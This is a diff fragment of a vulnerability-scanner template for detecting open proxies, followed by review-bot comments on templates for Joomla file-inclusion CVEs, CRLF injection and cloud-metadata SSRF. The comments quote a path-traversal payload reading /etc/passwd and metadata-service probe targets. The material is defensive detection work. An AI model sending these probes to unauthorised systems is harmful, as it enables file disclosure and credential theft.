@@ -59,3 +51,4 @@ requests: - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works")) +# Enhanced by cs on 2022/02/14
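Review bot: on the CVE-2010-1474 hunk (and the seven sibling Joomla LFI hunks that follow), the added `classification:` block carries only `cve-id`, whereas the other templates in this PR also fill `cvss-metrics`, `cvss-score` and `cwe-id`; a path traversal maps to CWE-22, so the block can be completed in the same style. The added `remediation: Upgrade to a supported version.` also names no fixed release; if none is known, say so rather than implying one exists.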
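Review bot: on the CVE-2010-1475 hunk, the unchanged `path` line has a doubled `=`: `{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00`. Every sibling template uses `controller=../`, so this looks like a typo that sends `=../..` as the parameter value and is unlikely to ever match; worth correcting while the file is being touched.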
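Review bot: on the CVE-2010-1478 hunk, `reference: |` in the context turns the two `- https://...` entries into a single literal string instead of the YAML list the other seven Joomla templates use; drop the `|`. Also, the blank `+` line inserted before `# Enhanced by mp on 2022/02/14` is unique to this file, the other hunks append the trailer directly after `- 200`, so pick one layout.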
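Review bot: on the CVE-2016-4975 info hunk, the context line `tags: crlf,generic,cves,cve2016,apache` uses `cves` where every other template in this PR uses `cve`, so this template drops out of tag-based selection of CVE checks; fix it in the same hunk. The hunk also removes `sullo` from `author` (as does the CVE-2021-1497 hunk) with no functional reason visible in the diff; if that is at the author's request it belongs in the commit message. Minor: the added `reference:` block is placed after `tags:`, whereas the other templates put `reference:` before `tags:`.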
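Review bot: on the metadata-alibaba info hunk, the rewritten line `remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.` closes with AWS terminology, and the same sentence is carried verbatim into the Azure, DigitalOcean, GCP, Hetzner and OpenStack templates, where there is no IMDSv2 to upgrade to. Since each of those hunks already rewrites the line for the spelling fix, tailor the second sentence per provider (point at whatever the linked provider documentation recommends, or drop it) and keep the IMDSv2 wording only for AWS and for Oracle, whose description explicitly names the IMDSv1 service.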
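Review bot: on the metadata-alibaba requests hunk, the blank line deleted between `Host: {{hostval}}` and `payloads:` is not a whitespace-only change: it is the trailing empty line of a `- |+` block scalar, and the `+` chomping indicator keeps trailing empty lines, so the raw request string changes from ending in a blank line (which terminates the HTTP header block) to ending right after the `Host` header. The same deletion appears in every metadata-*.yaml and open-proxy-*.yaml requests hunk in this PR. Either confirm the raw request engine terminates the header block itself, or change `|+` to `|` so the chomping indicator matches the new layout and the intent is clear to the next editor.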
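Review bot: on the metadata-azure requests hunk, the `hostval` payload list in the context pairs `aws.interact.sh` with `169.254.169.254`, and the same `aws.` name is reused in the DigitalOcean, GCP, Hetzner, OpenStack and Oracle templates; only the Alibaba template uses a provider-specific name (`alibaba.interact.sh`). This works only because the name is an alias for the same link-local address, and it makes the Azure check read as an AWS one; use a per-provider name as the Alibaba template does so the payloads are readable and hits are distinguishable.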
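Review bot: on the first metadata-openstack hunk (`@@ -1,5 +1,4 @@`), only the blank line after `id: metadata-service-openstack` is removed while the context line `# the proxy using the full metadata URL, which the proxy will fulfull to its` is left as is (and the `sevice` line just below the hunk is presumably untouched too). Every other metadata-*.yaml hunk in this PR corrects those two typos to `fulfill` and `service`; apply the same fix here.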
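Review bot: on the open-proxy-internal dsl hunk (`@@ -133,4 +106,5 @@`), the body_1 guard only covers body_2 and body_3. In `(!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || ...`, `&&` binds tighter than `||`, so a hit anywhere from body_4 onwards matches even when the baseline response body_1 already contains the string, which is exactly the false positive the guard is meant to exclude; the same shape is used in the `Microsoft Azure App` and `SSH` lines. Wrap the whole `||` chain in one pair of parentheses after the `&&`, as open-proxy-localhost.yaml already does with `(!contains(body_1, ...) && !contains(body_2, ...)) && (contains(body_3, ...) || ...)`. Separately, the raw list in the preceding hunk has 25 requests, but these chains stop at body_23 (body_24 appears only in the `ssh` line), so the `https://ntp/` and `ntp:22` responses are never examined.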
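Review bot: on the open-proxy-localhost requests hunk (`@@ -15,33 +14,26 @@`), the context line `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N` carries the same vector and score (8.6) that open-proxy-internal.yaml records as `CVSS:3.0/...`; since both files are touched in this PR, harmonize the version prefix.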
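Review bot: on the last hunk (open-proxy-localhost matchers), the dsl line `(!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || ...)` appears twice, verbatim, in the context; drop one copy while adding the trailer, it adds nothing but noise to the matcher list.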